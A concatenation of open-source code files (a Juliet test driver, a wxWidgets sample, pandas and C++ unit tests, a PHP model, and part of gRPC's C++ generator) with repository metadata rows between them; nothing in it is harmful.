using namespace CWE762_Mismatched_Memory_Management_Routines__delete_long_realloc_12; /* so that we can use good and bad easily */
int main(int argc, char * argv[])
{
/* seed randomness */
srand( (unsigned)time(NULL) );
#ifndef OMITGOOD
printLine("Calling good()...");
good();
printLine("Finished good()");
#endif /* OMITGOOD */
#ifndef OMITBAD
printLine("Calling bad()...");
bad();
printLine("Finished bad()");
#endif /* OMITBAD */
return 0;
}
#endif
| JianpingZeng/xcc | xcc/test/juliet/testcases/CWE762_Mismatched_Memory_Management_Routines/s04/CWE762_Mismatched_Memory_Management_Routines__delete_long_realloc_12.cpp | C++ | bsd-3-clause | 4,494 |
/////////////////////////////////////////////////////////////////////////////
// Program: wxWidgets Widgets Sample
// Name: fontpicker.cpp
// Purpose: Shows wxFontPickerCtrl
// Author: Francesco Montorsi
// Created: 20/6/2006
// Copyright: (c) 2006 Francesco Montorsi
// Licence: wxWindows licence
/////////////////////////////////////////////////////////////////////////////
// ============================================================================
// declarations
// ============================================================================
// ----------------------------------------------------------------------------
// headers
// ----------------------------------------------------------------------------
// for compilers that support precompilation, includes "wx/wx.h".
#include "wx/wxprec.h"
#if wxUSE_FONTPICKERCTRL
// for all others, include the necessary headers
#ifndef WX_PRECOMP
#include "wx/app.h"
#include "wx/log.h"
#include "wx/radiobox.h"
#endif
#include "wx/artprov.h"
#include "wx/sizer.h"
#include "wx/stattext.h"
#include "wx/checkbox.h"
#include "wx/imaglist.h"
#include "wx/fontpicker.h"
#include "widgets.h"
#include "icons/fontpicker.xpm"
// ----------------------------------------------------------------------------
// constants
// ----------------------------------------------------------------------------
// control ids
enum
{
PickerPage_Reset = wxID_HIGHEST,
PickerPage_Font
};
// ----------------------------------------------------------------------------
// FontPickerWidgetsPage
// ----------------------------------------------------------------------------
class FontPickerWidgetsPage : public WidgetsPage
{
public:
FontPickerWidgetsPage(WidgetsBookCtrl *book, wxImageList *imaglist);
virtual wxWindow *GetWidget() const wxOVERRIDE { return m_fontPicker; }
virtual void RecreateWidget() wxOVERRIDE { RecreatePicker(); }
// lazy creation of the content
virtual void CreateContent() wxOVERRIDE;
protected:
// called only once at first construction
void CreatePicker();
// called to recreate an existing control
void RecreatePicker();
// restore the checkboxes state to the initial values
void Reset();
void OnFontChange(wxFontPickerEvent &ev);
void OnCheckBox(wxCommandEvent &ev);
void OnButtonReset(wxCommandEvent &ev);
// the picker
wxFontPickerCtrl *m_fontPicker;
// other controls
// --------------
wxCheckBox *m_chkFontTextCtrl,
*m_chkFontDescAsLabel,
*m_chkFontUseFontForLabel;
wxBoxSizer *m_sizer;
private:
wxDECLARE_EVENT_TABLE();
DECLARE_WIDGETS_PAGE(FontPickerWidgetsPage)
};
// ----------------------------------------------------------------------------
// event tables
// ----------------------------------------------------------------------------
wxBEGIN_EVENT_TABLE(FontPickerWidgetsPage, WidgetsPage)
EVT_BUTTON(PickerPage_Reset, FontPickerWidgetsPage::OnButtonReset)
EVT_FONTPICKER_CHANGED(PickerPage_Font, FontPickerWidgetsPage::OnFontChange)
EVT_CHECKBOX(wxID_ANY, FontPickerWidgetsPage::OnCheckBox)
wxEND_EVENT_TABLE()
// ============================================================================
// implementation
// ============================================================================
#if defined(__WXGTK20__)
#define FAMILY_CTRLS NATIVE_CTRLS
#else
#define FAMILY_CTRLS GENERIC_CTRLS
#endif
IMPLEMENT_WIDGETS_PAGE(FontPickerWidgetsPage, "FontPicker",
PICKER_CTRLS | FAMILY_CTRLS);
FontPickerWidgetsPage::FontPickerWidgetsPage(WidgetsBookCtrl *book,
wxImageList *imaglist)
: WidgetsPage(book, imaglist, fontpicker_xpm)
{
}
void FontPickerWidgetsPage::CreateContent()
{
// left pane
wxSizer *boxleft = new wxBoxSizer(wxVERTICAL);
wxStaticBoxSizer *fontbox = new wxStaticBoxSizer(wxVERTICAL, this, "&FontPicker style");
m_chkFontTextCtrl = CreateCheckBoxAndAddToSizer(fontbox, "With textctrl");
m_chkFontDescAsLabel = CreateCheckBoxAndAddToSizer(fontbox, "Font desc as btn label");
m_chkFontUseFontForLabel = CreateCheckBoxAndAddToSizer(fontbox, "Use font for label");
boxleft->Add(fontbox, 0, wxALL|wxGROW, 5);
boxleft->Add(new wxButton(this, PickerPage_Reset, "&Reset"),
0, wxALIGN_CENTRE_HORIZONTAL | wxALL, 15);
Reset(); // set checkboxes state
// create pickers
m_fontPicker = NULL;
CreatePicker();
// right pane
m_sizer = new wxBoxSizer(wxVERTICAL);
m_sizer->Add(1, 1, 1, wxGROW | wxALL, 5); // spacer
m_sizer->Add(m_fontPicker, 0, wxALIGN_CENTER|wxALL, 5);
m_sizer->Add(1, 1, 1, wxGROW | wxALL, 5); // spacer
// global pane
wxSizer *sz = new wxBoxSizer(wxHORIZONTAL);
sz->Add(boxleft, 0, wxGROW|wxALL, 5);
sz->Add(m_sizer, 1, wxGROW|wxALL, 5);
SetSizer(sz);
}
void FontPickerWidgetsPage::CreatePicker()
{
delete m_fontPicker;
long style = GetAttrs().m_defaultFlags;
if ( m_chkFontTextCtrl->GetValue() )
style |= wxFNTP_USE_TEXTCTRL;
if ( m_chkFontUseFontForLabel->GetValue() )
style |= wxFNTP_USEFONT_FOR_LABEL;
if ( m_chkFontDescAsLabel->GetValue() )
style |= wxFNTP_FONTDESC_AS_LABEL;
m_fontPicker = new wxFontPickerCtrl(this, PickerPage_Font,
*wxSWISS_FONT,
wxDefaultPosition, wxDefaultSize,
style);
}
void FontPickerWidgetsPage::RecreatePicker()
{
m_sizer->Remove(1);
CreatePicker();
m_sizer->Insert(1, m_fontPicker, 0, wxALIGN_CENTER|wxALL, 5);
m_sizer->Layout();
}
void FontPickerWidgetsPage::Reset()
{
m_chkFontTextCtrl->SetValue((wxFNTP_DEFAULT_STYLE & wxFNTP_USE_TEXTCTRL) != 0);
m_chkFontUseFontForLabel->SetValue((wxFNTP_DEFAULT_STYLE & wxFNTP_USEFONT_FOR_LABEL) != 0);
m_chkFontDescAsLabel->SetValue((wxFNTP_DEFAULT_STYLE & wxFNTP_FONTDESC_AS_LABEL) != 0);
}
// ----------------------------------------------------------------------------
// event handlers
// ----------------------------------------------------------------------------
void FontPickerWidgetsPage::OnButtonReset(wxCommandEvent& WXUNUSED(event))
{
Reset();
RecreatePicker();
}
void FontPickerWidgetsPage::OnFontChange(wxFontPickerEvent& event)
{
wxLogMessage("The font changed to '%s' with size %d !",
event.GetFont().GetFaceName(), event.GetFont().GetPointSize());
}
void FontPickerWidgetsPage::OnCheckBox(wxCommandEvent &event)
{
if (event.GetEventObject() == m_chkFontTextCtrl ||
event.GetEventObject() == m_chkFontDescAsLabel ||
event.GetEventObject() == m_chkFontUseFontForLabel)
RecreatePicker();
}
#endif // wxUSE_FONTPICKERCTRL
| ric2b/Vivaldi-browser | update_notifier/thirdparty/wxWidgets/samples/widgets/fontpicker.cpp | C++ | bsd-3-clause | 6,890 |
require 'mxx_ru/cpp'
MxxRu::Cpp::exe_target {
required_prj "ace/dll.rb"
target "_microbench.demand_queue_2_bench_1"
cpp_source "main.cpp"
}
| Free4Lila/s-objectizer | so_5/5.2.4-microbenchmarking/dev/microbenchmarks/so_5/demand_queue_2_bench_1/prj.rb | Ruby | bsd-3-clause | 147 |
#include "ClangInvoker.h"
#include "ThreadExecutor.h"
#include "windycode/Support.h"
#include <unistd.h>
#include "gtest/gtest.h"
namespace windycode {
namespace clang {
namespace {
class CharDeleter {
public:
void operator()(char *p) { free(p); }
};
static std::string getUnittestPath() {
static std::string Path;
static bool Initialized = false;
if (!Initialized) {
Initialized = true;
std::unique_ptr<char, CharDeleter> CurrentPath(getcwd(nullptr, 0));
Path = parentPath(CurrentPath.get());
appendPath(Path, "unittests");
if (!isDirectory(Path))
return std::string();
}
return Path;
}
static std::string getUnittestFilePath(string_ref FileName) {
std::string Path = getUnittestPath();
if (Path.empty())
return Path;
appendPath(Path, FileName);
return Path;
}
TEST(ClangInvokerTest, Singleton) {
ClangInvoker *Instance = ClangInvoker::getInstance();
ASSERT_NE(Instance, nullptr);
ASSERT_EQ(Instance, ClangInvoker::getInstance());
}
TEST(ClangInvokerTest, GetUnitestDirectory) {
ASSERT_FALSE(getUnittestPath().empty());
}
TEST(ClangInvokerTest, ClangInfo) {
ClangInfo Info;
ClangInvoker *Instance = ClangInvoker::getInstance();
Instance->getClangInfo(&Info);
}
TEST(ClangInvokerTest, OpenAndCloseFile) {
ClangInvoker *Instance = ClangInvoker::getInstance();
std::string FileName = getUnittestFilePath("test01.c");
ASSERT_FALSE(Instance->openFile("test01.c").ok());
ASSERT_TRUE(Instance->openFile(FileName).ok());
EXPECT_TRUE(Instance->closeFile(FileName).ok());
ThreadExecutor::sync();
}
TEST(ClangInvokerTest, getDiagnostics) {
ClangInvoker *Instance = ClangInvoker::getInstance();
google::protobuf::RepeatedPtrField<Diagnostic> DSet;
std::string FileName = getUnittestFilePath("test02.c");
ASSERT_TRUE(Instance->openFile(FileName).ok());
ASSERT_TRUE(Instance->getDiagnosticSet(FileName, &DSet).ok());
EXPECT_NE(0, DSet.size());
// EXPECT_NE(0u, DSet[0]->category());
EXPECT_TRUE(Instance->closeFile(FileName).ok());
ThreadExecutor::sync();
}
// FIXME
// Disable codeCompletAt on linux since we haven't add support for gcc builtin
// headers' finding
#ifndef CH_OS_LINUX
TEST(ClangInvokerTest, codeCompleteAt) {
ClangInvoker *Instance = ClangInvoker::getInstance();
unsigned StartColumn;
google::protobuf::RepeatedPtrField<CompletionData> Completions;
std::string FileName = getUnittestFilePath("test02.c");
SourceLocation Location;
Location.set_file_name(FileName);
Location.set_line(1);
Location.set_column(1);
ASSERT_TRUE(Instance->openFile(FileName).ok());
ASSERT_TRUE(
Instance->codeCompleteAt(Location, &StartColumn, &Completions).ok());
EXPECT_NE(0, Completions.size());
Location.set_line(5);
Location.set_column(7);
ASSERT_TRUE(
Instance->codeCompleteAt(Location, &StartColumn, &Completions).ok());
ASSERT_NE(0, Completions.size());
EXPECT_EQ(3u, StartColumn);
// const auto &Completion = Completions.front();
// EXPECT_STREQ("print", Completion.Text().c_str());
EXPECT_TRUE(Instance->closeFile(FileName).ok());
ThreadExecutor::sync();
}
#endif
TEST(ClangInvokerTest, getDefinition) {
ClangInvoker *Instance = ClangInvoker::getInstance();
google::protobuf::RepeatedPtrField<Diagnostic> Diags;
std::string FileName = getUnittestFilePath("test03.c");
ASSERT_TRUE(Instance->openFile(FileName).ok());
ASSERT_TRUE(Instance->getDiagnosticSet(FileName, &Diags).ok());
ASSERT_EQ(0, Diags.size());
SourceLocation Location, SrcLocation;
Location.set_file_name(FileName);
Location.set_line(6);
Location.set_column(10);
ASSERT_TRUE(Instance->getDefinition(Location, &SrcLocation).ok());
EXPECT_EQ(1u, SrcLocation.line());
EXPECT_EQ(8u, SrcLocation.column());
Location.set_line(7);
Location.set_column(16);
ASSERT_TRUE(Instance->getDefinition(Location, &SrcLocation).ok());
EXPECT_EQ(6u, SrcLocation.line());
EXPECT_EQ(12u, SrcLocation.column());
Location.set_line(7);
Location.set_column(17);
ASSERT_TRUE(Instance->getDefinition(Location, &SrcLocation).ok());
EXPECT_EQ(6u, SrcLocation.line());
EXPECT_EQ(12u, SrcLocation.column());
Location.set_line(7);
Location.set_column(18);
ASSERT_TRUE(Instance->getDefinition(Location, &SrcLocation).ok());
EXPECT_EQ(6u, SrcLocation.line());
EXPECT_EQ(12u, SrcLocation.column());
EXPECT_TRUE(Instance->closeFile(FileName).ok());
ThreadExecutor::sync();
}
TEST(ClangInvokerTest, getCursorDetail) {
ClangInvoker *Instance = ClangInvoker::getInstance();
CursorDetail Detail;
std::string FileName = getUnittestFilePath("test04.c");
ASSERT_TRUE(Instance->openFile(FileName).ok());
SourceLocation Location;
Location.set_file_name(FileName);
Location.set_line(3);
Location.set_column(8);
ASSERT_TRUE(Instance->getCursorDetail(Location, &Detail).ok());
// EXPECT_FALSE(Detail.type().empty());
// EXPECT_FALSE(Detail.kind().empty());
// EXPECT_FALSE(Detail.canonicalType().empty());
// EXPECT_FALSE(Detail.spellingName().empty());
// EXPECT_FALSE(Detail.rawComment().empty());
// EXPECT_EQ("/// \\brief hello\n/// this is a comment", Detail.rawComment());
// EXPECT_FALSE(Detail.briefComment().empty());
// EXPECT_EQ("hello this is a comment", Detail.briefComment());
// EXPECT_FALSE(Detail.xmlComment().empty());
// ASSERT_TRUE(
// Instance->getCursorDetail(FileName, 3, 10, &Detail).ok());
// EXPECT_EQ("/// \\brief hello\n/// this is a comment", Detail.rawComment());
// EXPECT_EQ("hello this is a comment", Detail.briefComment());
// ASSERT_TRUE(
// Instance->getCursorDetail(FileName, 3, 12, &Detail).ok());
// EXPECT_EQ("/// \\brief hello\n/// this is a comment", Detail.rawComment());
// EXPECT_EQ("hello this is a comment", Detail.briefComment());
EXPECT_TRUE(Instance->closeFile(FileName).ok());
ThreadExecutor::sync();
}
TEST(ClangInvokerTest, getCursorDetailComments) {
ClangInvoker *Instance = ClangInvoker::getInstance();
CursorDetail Detail;
SourceLocation Location;
std::string FileName = getUnittestFilePath("test05.cc");
ASSERT_TRUE(Instance->openFile(FileName).ok());
Location.set_file_name(FileName);
Location.set_line(3);
Location.set_column(7);
ASSERT_TRUE(Instance->getCursorDetail(Location, &Detail).ok());
// EXPECT_FALSE(Detail.rawComment().empty() ||
// Detail.briefComment().empty() ||
// Detail.xmlComment().empty());
// ASSERT_TRUE(
// Instance->getCursorDetail(FileName, 7, 10, &Detail).ok());
// EXPECT_FALSE(Detail.rawComment().empty() ||
// Detail.briefComment().empty() ||
// Detail.xmlComment().empty());
// ASSERT_TRUE(
// Instance->getCursorDetail(FileName, 10, 10, &Detail).ok());
// EXPECT_FALSE(Detail.rawComment().empty() ||
// Detail.briefComment().empty() ||
// Detail.xmlComment().empty());
// ASSERT_TRUE(
// Instance->getCursorDetail(FileName, 15, 7, &Detail).ok());
// EXPECT_FALSE(Detail.rawComment().empty() ||
// Detail.briefComment().empty() ||
// Detail.xmlComment().empty());
// ASSERT_TRUE(
// Instance->getCursorDetail(FileName, 17, 6, &Detail));
// EXPECT_FALSE(Detail.rawComment().empty() ||
// Detail.briefComment().empty() ||
// Detail.xmlComment().empty());
// ASSERT_TRUE(
// Instance->getCursorDetail(FileName, 18, 5, &Detail));
// EXPECT_FALSE(Detail.rawComment().empty() ||
// Detail.briefComment().empty() ||
// Detail.xmlComment().empty());
// ASSERT_TRUE(
// Instance->getCursorDetail(FileName, 19, 5, &Detail));
// EXPECT_FALSE(Detail.rawComment().empty() ||
// Detail.briefComment().empty() ||
// Detail.xmlComment().empty());
// ASSERT_TRUE(
// Instance->getCursorDetail(FileName, 20, 3, &Detail));
// EXPECT_FALSE(Detail.rawComment().empty() ||
// Detail.briefComment().empty() ||
// Detail.xmlComment().empty());
EXPECT_TRUE(Instance->closeFile(FileName).ok());
ThreadExecutor::sync();
}
} // anonymous namespace
} // namespace clang
} // namespace windycode
| Chilledheart/windycode | src/ClangSupport/ClangInvoker_unittest.cc | C++ | bsd-3-clause | 8,378 |
from datetime import datetime
import inspect
import numpy as np
import pytest
from pandas.core.dtypes.common import (
is_categorical_dtype,
is_interval_dtype,
is_object_dtype,
)
from pandas import (
Categorical,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
Series,
Timestamp,
cut,
date_range,
to_datetime,
)
import pandas._testing as tm
class TestDataFrameAlterAxes:
def test_set_index_directly(self, float_string_frame):
df = float_string_frame
idx = Index(np.arange(len(df))[::-1])
df.index = idx
tm.assert_index_equal(df.index, idx)
with pytest.raises(ValueError, match="Length mismatch"):
df.index = idx[::2]
def test_convert_dti_to_series(self):
# don't cast a DatetimeIndex WITH a tz, leave as object
# GH 6032
idx = DatetimeIndex(
to_datetime(["2013-1-1 13:00", "2013-1-2 14:00"]), name="B"
).tz_localize("US/Pacific")
df = DataFrame(np.random.randn(2, 1), columns=["A"])
expected = Series(
np.array(
[
Timestamp("2013-01-01 13:00:00-0800", tz="US/Pacific"),
Timestamp("2013-01-02 14:00:00-0800", tz="US/Pacific"),
],
dtype="object",
),
name="B",
)
# convert index to series
result = Series(idx)
tm.assert_series_equal(result, expected)
# assign to frame
df["B"] = idx
result = df["B"]
tm.assert_series_equal(result, expected)
# convert to series while keeping the timezone
msg = "stop passing 'keep_tz'"
with tm.assert_produces_warning(FutureWarning) as m:
result = idx.to_series(keep_tz=True, index=[0, 1])
tm.assert_series_equal(result, expected)
assert msg in str(m[0].message)
# convert to utc
with tm.assert_produces_warning(FutureWarning) as m:
df["B"] = idx.to_series(keep_tz=False, index=[0, 1])
result = df["B"]
comp = Series(DatetimeIndex(expected.values).tz_localize(None), name="B")
tm.assert_series_equal(result, comp)
msg = "do 'idx.tz_convert(None)' before calling"
assert msg in str(m[0].message)
result = idx.to_series(index=[0, 1])
tm.assert_series_equal(result, expected)
with tm.assert_produces_warning(FutureWarning) as m:
result = idx.to_series(keep_tz=False, index=[0, 1])
tm.assert_series_equal(result, expected.dt.tz_convert(None))
msg = "do 'idx.tz_convert(None)' before calling"
assert msg in str(m[0].message)
# list of datetimes with a tz
df["B"] = idx.to_pydatetime()
result = df["B"]
tm.assert_series_equal(result, expected)
# GH 6785
# set the index manually
import pytz
df = DataFrame([{"ts": datetime(2014, 4, 1, tzinfo=pytz.utc), "foo": 1}])
expected = df.set_index("ts")
df.index = df["ts"]
df.pop("ts")
tm.assert_frame_equal(df, expected)
def test_set_columns(self, float_string_frame):
cols = Index(np.arange(len(float_string_frame.columns)))
float_string_frame.columns = cols
with pytest.raises(ValueError, match="Length mismatch"):
float_string_frame.columns = cols[::2]
def test_dti_set_index_reindex(self):
# GH 6631
df = DataFrame(np.random.random(6))
idx1 = date_range("2011/01/01", periods=6, freq="M", tz="US/Eastern")
idx2 = date_range("2013", periods=6, freq="A", tz="Asia/Tokyo")
df = df.set_index(idx1)
tm.assert_index_equal(df.index, idx1)
df = df.reindex(idx2)
tm.assert_index_equal(df.index, idx2)
# GH 11314
# with tz
index = date_range(
datetime(2015, 10, 1), datetime(2015, 10, 1, 23), freq="H", tz="US/Eastern"
)
df = DataFrame(np.random.randn(24, 1), columns=["a"], index=index)
new_index = date_range(
datetime(2015, 10, 2), datetime(2015, 10, 2, 23), freq="H", tz="US/Eastern"
)
result = df.set_index(new_index)
assert result.index.freq == index.freq
# Renaming
def test_reindex_api_equivalence(self):
# equivalence of the labels/axis and index/columns API's
df = DataFrame(
[[1, 2, 3], [3, 4, 5], [5, 6, 7]],
index=["a", "b", "c"],
columns=["d", "e", "f"],
)
res1 = df.reindex(["b", "a"])
res2 = df.reindex(index=["b", "a"])
res3 = df.reindex(labels=["b", "a"])
res4 = df.reindex(labels=["b", "a"], axis=0)
res5 = df.reindex(["b", "a"], axis=0)
for res in [res2, res3, res4, res5]:
tm.assert_frame_equal(res1, res)
res1 = df.reindex(columns=["e", "d"])
res2 = df.reindex(["e", "d"], axis=1)
res3 = df.reindex(labels=["e", "d"], axis=1)
for res in [res2, res3]:
tm.assert_frame_equal(res1, res)
res1 = df.reindex(index=["b", "a"], columns=["e", "d"])
res2 = df.reindex(columns=["e", "d"], index=["b", "a"])
res3 = df.reindex(labels=["b", "a"], axis=0).reindex(labels=["e", "d"], axis=1)
for res in [res2, res3]:
tm.assert_frame_equal(res1, res)
def test_assign_columns(self, float_frame):
float_frame["hi"] = "there"
df = float_frame.copy()
df.columns = ["foo", "bar", "baz", "quux", "foo2"]
tm.assert_series_equal(float_frame["C"], df["baz"], check_names=False)
tm.assert_series_equal(float_frame["hi"], df["foo2"], check_names=False)
def test_set_index_preserve_categorical_dtype(self):
# GH13743, GH13854
df = DataFrame(
{
"A": [1, 2, 1, 1, 2],
"B": [10, 16, 22, 28, 34],
"C1": Categorical(list("abaab"), categories=list("bac"), ordered=False),
"C2": Categorical(list("abaab"), categories=list("bac"), ordered=True),
}
)
for cols in ["C1", "C2", ["A", "C1"], ["A", "C2"], ["C1", "C2"]]:
result = df.set_index(cols).reset_index()
result = result.reindex(columns=df.columns)
tm.assert_frame_equal(result, df)
def test_rename_signature(self):
sig = inspect.signature(DataFrame.rename)
parameters = set(sig.parameters)
assert parameters == {
"self",
"mapper",
"index",
"columns",
"axis",
"inplace",
"copy",
"level",
"errors",
}
def test_reindex_signature(self):
sig = inspect.signature(DataFrame.reindex)
parameters = set(sig.parameters)
assert parameters == {
"self",
"labels",
"index",
"columns",
"axis",
"limit",
"copy",
"level",
"method",
"fill_value",
"tolerance",
}
class TestIntervalIndex:
def test_setitem(self):
df = DataFrame({"A": range(10)})
s = cut(df.A, 5)
assert isinstance(s.cat.categories, IntervalIndex)
# B & D end up as Categoricals
# the remainer are converted to in-line objects
# contining an IntervalIndex.values
df["B"] = s
df["C"] = np.array(s)
df["D"] = s.values
df["E"] = np.array(s.values)
assert is_categorical_dtype(df["B"].dtype)
assert is_interval_dtype(df["B"].cat.categories)
assert is_categorical_dtype(df["D"].dtype)
assert is_interval_dtype(df["D"].cat.categories)
assert is_object_dtype(df["C"])
assert is_object_dtype(df["E"])
# they compare equal as Index
# when converted to numpy objects
c = lambda x: Index(np.array(x))
tm.assert_index_equal(c(df.B), c(df.B), check_names=False)
tm.assert_index_equal(c(df.B), c(df.C), check_names=False)
tm.assert_index_equal(c(df.B), c(df.D), check_names=False)
tm.assert_index_equal(c(df.B), c(df.D), check_names=False)
# B & D are the same Series
tm.assert_series_equal(df["B"], df["B"], check_names=False)
tm.assert_series_equal(df["B"], df["D"], check_names=False)
# C & E are the same Series
tm.assert_series_equal(df["C"], df["C"], check_names=False)
tm.assert_series_equal(df["C"], df["E"], check_names=False)
def test_set_reset_index(self):
df = DataFrame({"A": range(10)})
s = cut(df.A, 5)
df["B"] = s
df = df.set_index("B")
df = df.reset_index()
| TomAugspurger/pandas | pandas/tests/frame/test_alter_axes.py | Python | bsd-3-clause | 8,801 |
<?php
namespace app\models;
use Yii;
class Measure extends \yii\db\ActiveRecord {
public static function tableName() {
return '{{%measure}}';
}
public function getColum($cnum, $date, $row, $col) {
$obj = self::find()->where([
'cnum' => $cnum,
'date' => $date,
'row' => $row,
'col' => $col,
])->select(['val'])->one();
return $obj ? $obj->val : '';
}
public function getMonth($date) {
$cnum = YII::$app->user->identity->cnum;
$obj = self::find()->where([
'cnum' => $cnum,
'date' => $date,
])->select(['val', 'row', 'col'])->all();
$data = [];
if ($obj) {
foreach ($obj as $key => $val) {
$data[$val->row][$val->col] = $val->val;
}
}
return $data;
}
}
| realphp/yii2-admin | models/Measure.php | PHP | bsd-3-clause | 946 |
#include "gtest/gtest.h"
#include "C3_Stack.hh"
TEST( StackTest, Construct )
{
C3::size_type nframes = 2;
C3::size_type ncolumns = 3;
C3::size_type nrows = 4;
C3::Stack< int > container( nframes, ncolumns, nrows );
EXPECT_EQ( nframes , container.nframes() );
EXPECT_EQ( ncolumns, container.ncolumns() );
EXPECT_EQ( nrows , container.nrows() );
}
TEST( StackTest, ConstructWithInitialization )
{
C3::size_type nframes = 2;
C3::size_type ncolumns = 3;
C3::size_type nrows = 4;
C3::Stack< int > container( nframes, ncolumns, nrows, 37 );
EXPECT_EQ( nframes , container.nframes() );
EXPECT_EQ( ncolumns, container.ncolumns() );
EXPECT_EQ( nrows , container.nrows() );
for( auto pixel : container ) EXPECT_EQ( 37, pixel );
}
TEST( StackTest, AccessByCoordinates )
{
C3::size_type nframes = 2;
C3::size_type ncolumns = 3;
C3::size_type nrows = 4;
C3::Stack< int > container( nframes, ncolumns, nrows );
auto pos = 0;
for( auto k = 0; k < nrows; ++k )
{
for( auto j = 0; j < ncolumns; ++j )
{
for( auto i = 0; i < nframes; ++i ) container( i, j, k ) = pos++;
}
}
pos = 0;
for( auto pixel : container ) EXPECT_EQ( pos++, pixel );
pos = 531;
for( auto& pixel : container ) pixel = pos++;
pos = 531;
for( auto k = 0; k < nrows; ++k )
{
for( auto j = 0; j < ncolumns; ++j )
{
for( auto i = 0; i < nframes; ++i ) EXPECT_EQ( pos++, container( i, j, k ) );
}
}
}
TEST( StackTest, AssignPixel )
{
C3::size_type nframes = 2;
C3::size_type ncolumns = 3;
C3::size_type nrows = 4;
C3::Stack< int > container( nframes, ncolumns, nrows );
auto const number = 312211;
container = number;
for( auto pixel : container ) EXPECT_EQ( number, pixel );
}
TEST( StackTest, ConvertValueType )
{
C3::size_type nframes = 2;
C3::size_type ncolumns = 2;
C3::size_type nrows = 3;
C3::Stack< double > container( nframes, ncolumns, nrows );
container( 0, 0, 0 ) = 1.1;
container( 1, 0, 0 ) = 11.2;
container( 0, 1, 0 ) = 21.3;
container( 1, 1, 0 ) = 1211.4;
container( 0, 0, 1 ) = 111221.5;
container( 1, 0, 1 ) = 312211.5;
container( 0, 1, 1 ) = 21.1;
container( 1, 1, 1 ) = 211.2;
container( 0, 0, 2 ) = 221.3;
container( 1, 0, 2 ) = 21211.4;
container( 0, 1, 2 ) = 2111221.5;
container( 1, 1, 2 ) = 2312211.5;
auto other = C3::Stack< int >( container );
EXPECT_EQ( 1 , other( 0, 0, 0 ) );
EXPECT_EQ( 11 , other( 1, 0, 0 ) );
EXPECT_EQ( 21 , other( 0, 1, 0 ) );
EXPECT_EQ( 1211 , other( 1, 1, 0 ) );
EXPECT_EQ( 111221 , other( 0, 0, 1 ) );
EXPECT_EQ( 312211 , other( 1, 0, 1 ) );
EXPECT_EQ( 21 , other( 0, 1, 1 ) );
EXPECT_EQ( 211 , other( 1, 1, 1 ) );
EXPECT_EQ( 221 , other( 0, 0, 2 ) );
EXPECT_EQ( 21211 , other( 1, 0, 2 ) );
EXPECT_EQ( 2111221, other( 0, 1, 2 ) );
EXPECT_EQ( 2312211, other( 1, 1, 2 ) );
}
| rcthomas/C3 | testing/013-stack-test.cc | C++ | bsd-3-clause | 3,107 |
/*
*
* Copyright 2015, Google Inc.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are
* met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following disclaimer
* in the documentation and/or other materials provided with the
* distribution.
* * Neither the name of Google Inc. nor the names of its
* contributors may be used to endorse or promote products derived from
* this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
* OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
*/
#include <string>
#include <map>
#include "src/compiler/cpp_generator.h"
#include "src/compiler/cpp_generator_helpers.h"
#include <google/protobuf/descriptor.h>
#include <google/protobuf/descriptor.pb.h>
#include <google/protobuf/io/printer.h>
#include <google/protobuf/io/zero_copy_stream_impl_lite.h>
#include <sstream>
namespace grpc_cpp_generator {
namespace {
template <class T>
std::string as_string(T x) {
std::ostringstream out;
out << x;
return out.str();
}
bool NoStreaming(const google::protobuf::MethodDescriptor *method) {
return !method->client_streaming() && !method->server_streaming();
}
bool ClientOnlyStreaming(const google::protobuf::MethodDescriptor *method) {
return method->client_streaming() && !method->server_streaming();
}
bool ServerOnlyStreaming(const google::protobuf::MethodDescriptor *method) {
return !method->client_streaming() && method->server_streaming();
}
bool BidiStreaming(const google::protobuf::MethodDescriptor *method) {
return method->client_streaming() && method->server_streaming();
}
bool HasUnaryCalls(const google::protobuf::FileDescriptor *file) {
for (int i = 0; i < file->service_count(); i++) {
for (int j = 0; j < file->service(i)->method_count(); j++) {
if (NoStreaming(file->service(i)->method(j))) {
return true;
}
}
}
return false;
}
bool HasClientOnlyStreaming(const google::protobuf::FileDescriptor *file) {
for (int i = 0; i < file->service_count(); i++) {
for (int j = 0; j < file->service(i)->method_count(); j++) {
if (ClientOnlyStreaming(file->service(i)->method(j))) {
return true;
}
}
}
return false;
}
bool HasServerOnlyStreaming(const google::protobuf::FileDescriptor *file) {
for (int i = 0; i < file->service_count(); i++) {
for (int j = 0; j < file->service(i)->method_count(); j++) {
if (ServerOnlyStreaming(file->service(i)->method(j))) {
return true;
}
}
}
return false;
}
bool HasBidiStreaming(const google::protobuf::FileDescriptor *file) {
for (int i = 0; i < file->service_count(); i++) {
for (int j = 0; j < file->service(i)->method_count(); j++) {
if (BidiStreaming(file->service(i)->method(j))) {
return true;
}
}
}
return false;
}
} // namespace
std::string GetHeaderIncludes(const google::protobuf::FileDescriptor *file) {
std::string temp =
"#include <grpc++/impl/internal_stub.h>\n"
"#include <grpc++/impl/service_type.h>\n"
"#include <grpc++/status.h>\n"
"\n"
"namespace grpc {\n"
"class CompletionQueue;\n"
"class ChannelInterface;\n"
"class RpcService;\n"
"class ServerContext;\n";
if (HasUnaryCalls(file)) {
temp.append(
"template <class OutMessage> class ClientAsyncResponseReader;\n");
temp.append(
"template <class OutMessage> class ServerAsyncResponseWriter;\n");
}
if (HasClientOnlyStreaming(file)) {
temp.append("template <class OutMessage> class ClientWriter;\n");
